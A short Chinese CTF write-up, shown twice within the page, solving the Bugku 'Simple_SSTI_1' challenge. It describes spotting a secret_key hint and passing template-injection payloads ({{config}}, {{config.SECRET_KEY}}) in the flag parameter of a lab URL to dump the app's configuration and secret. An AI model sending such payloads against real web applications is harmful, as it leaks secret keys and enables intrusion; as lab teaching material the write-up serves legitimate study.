题目:
进入页面先按F12
有个提示secret_key
考虑模板注入
输入url:
http://114.67.175.224:10472/?flag={{config}}
直接找到了flag
如果访问
http://114.67.175.224:10472/?flag={{config.SECRET_KEY}}
可以直接显示flag
0
点赞
收藏
分享
[bugku]Simple_SSTI_1
相关推荐
0 条评论
题目:
进入页面先按F12
有个提示secret_key
考虑模板注入
输入url:
http://114.67.175.224:10472/?flag={{config}}
直接找到了flag
如果访问
http://114.67.175.224:10472/?flag={{config.SECRET_KEY}}
可以直接显示flag
相关推荐
